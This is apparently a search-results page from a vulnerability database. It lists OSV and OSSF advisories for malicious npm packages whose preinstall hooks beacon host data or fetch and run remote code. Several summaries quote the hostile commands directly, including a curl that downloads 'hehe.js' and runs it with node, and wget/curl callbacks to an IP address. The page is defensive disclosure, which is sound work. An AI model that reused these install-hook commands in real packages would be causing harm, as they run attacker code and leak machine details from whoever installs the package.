Lucene search
K

1214 matches found

OSV
OSV
added 2026/06/12 9:31 p.m.9 views

MAL-2026-5721 Malicious code in ect-839201-ctf (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bda37f74ff0d1b56cb7805906d4fd32a7e2ccc15aa96768d9f9e510202712dcb On npm install, package.json's preinstall script executes wget http://10.107.121.85:8000/callbackwget || curl http://10.107.121.85:8000/callbackcurl ...

6.2AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/12 7:2 p.m.10 views

Malicious code in eslint-plugin-mistica-local-rules (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c1d21f50741178986b63d1f330373131c2f3f502a5b94e76ca921ce185fab123 package.json declares a preinstall hook that runs index.js automatically on npm install. index.js collects host identity os.hostname, os.platform,...

5.3AI score
Exploits0References1
OSV
OSV
added 2026/06/12 7:2 p.m.11 views

MAL-2026-5703 Malicious code in eslint-plugin-mistica-local-rules (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c1d21f50741178986b63d1f330373131c2f3f502a5b94e76ca921ce185fab123 package.json declares a preinstall hook that runs index.js automatically on npm install. index.js collects host identity os.hostname, os.platform,...

5.3AI score
Exploits0References1
OSV
OSV
added 2026/06/11 12:38 p.m.10 views

MAL-2026-5645 Malicious code in sn-internal-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 12:38 p.m.8 views

Malicious code in sn-internal-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...

5.8AI score
Exploits0References3
OSV
OSV
added 2026/06/11 12:38 p.m.7 views

MAL-2026-5646 Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install,...

5.4AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 12:38 p.m.11 views

Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install,...

5.4AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 4:37 a.m.10 views

Malicious code in testzapier (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a5840f2a3b34d7f32de7243a146ecf85ac875bd1ef09b0ba9a395d08e356084f package.json declares a preinstall hook node index.js that fires automatically on npm install. index.js spawns a shell that runs curl -X POST against...

5.5AI score
Exploits0References2
OSV
OSV
added 2026/06/11 4:37 a.m.16 views

MAL-2026-5575 Malicious code in testzapier (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a5840f2a3b34d7f32de7243a146ecf85ac875bd1ef09b0ba9a395d08e356084f package.json declares a preinstall hook node index.js that fires automatically on npm install. index.js spawns a shell that runs curl -X POST against...

5.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 1:42 a.m.11 views

Malicious code in pocteszep (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d The package's npm preinstall lifecycle script runs wget --quiet...

5.6AI score
Exploits0References7
OSV
OSV
added 2026/06/11 1:42 a.m.13 views

MAL-2026-5544 Malicious code in pocteszep (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d The package's npm preinstall lifecycle script runs wget --quiet...

5.6AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 12:28 a.m.10 views

Malicious code in @entos-ems/xerxes-client-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5632d30e60b3bb5fc5d731458a7c2972bd356c3ec1a9e8064df135359ee4ec7b On npm install, package.json's preinstall: node index.js hook fires automatically and runs a reconnaissance beacon. index.js collects host identifier...

5.5AI score
Exploits0References1
OSV
OSV
added 2026/06/11 12:28 a.m.13 views

MAL-2026-5537 Malicious code in @entos-ems/xerxes-client-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5632d30e60b3bb5fc5d731458a7c2972bd356c3ec1a9e8064df135359ee4ec7b On npm install, package.json's preinstall: node index.js hook fires automatically and runs a reconnaissance beacon. index.js collects host identifier...

5.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/10 6:22 p.m.13 views

Malicious code in @orion-design-system/foundation (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3e7fdf1bb78d6c3750adffa854f5f08c7f2fd7af6166f7234aa5cbf4974a1375 The package's npm preinstall lifecycle script runs an inline node -e payload that collects the installer's hostname os.hostname and OS username...

5.5AI score
Exploits0References5
OSV
OSV
added 2026/06/10 6:22 p.m.9 views

MAL-2026-5523 Malicious code in @orion-design-system/foundation (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3e7fdf1bb78d6c3750adffa854f5f08c7f2fd7af6166f7234aa5cbf4974a1375 The package's npm preinstall lifecycle script runs an inline node -e payload that collects the installer's hostname os.hostname and OS username...

5.5AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/10 6:22 p.m.12 views

Malicious code in @orion-design-system/components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector edd5d007da2de0a07fc1a0d999cccbf71a748627c82c9b2000d161eb248a5a0f package.json declares a preinstall hook that runs an inline node -e script reading os.hostname and os.userInfo.username and transmitting them via HTT...

5.4AI score
Exploits0References4
OSV
OSV
added 2026/06/10 6:22 p.m.12 views

MAL-2026-5522 Malicious code in @orion-design-system/components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector edd5d007da2de0a07fc1a0d999cccbf71a748627c82c9b2000d161eb248a5a0f package.json declares a preinstall hook that runs an inline node -e script reading os.hostname and os.userInfo.username and transmitting them via HTT...

5.4AI score
Exploits0References4
OSV
OSV
added 2026/06/10 6:21 p.m.11 views

MAL-2026-5524 Malicious code in @orion-design-system/store (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4218505b74ba258cea12df713bbc27db9fa58d6660cf83e6d0c5fd8a9f68a4c2 package.json declares a preinstall script that runs on every npm install. The script uses node -e to require os and https, reads os.hostname and...

5.4AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/10 6:21 p.m.13 views

Malicious code in @orion-design-system/store (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4218505b74ba258cea12df713bbc27db9fa58d6660cf83e6d0c5fd8a9f68a4c2 package.json declares a preinstall script that runs on every npm install. The script uses node -e to require os and https, reads os.hostname and...

5.4AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/10 5:38 p.m.9 views

Malicious code in firefly-utilities-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cadcdda902675162dd9cfabd9d8133986723d4c956437633f36a5a07b776ef59 [email protected] ships an empty stub index.js: module.exports = ; with no description, author, or repository, but declares a single...

5.6AI score
Exploits0References1
Rows per page
Query Builder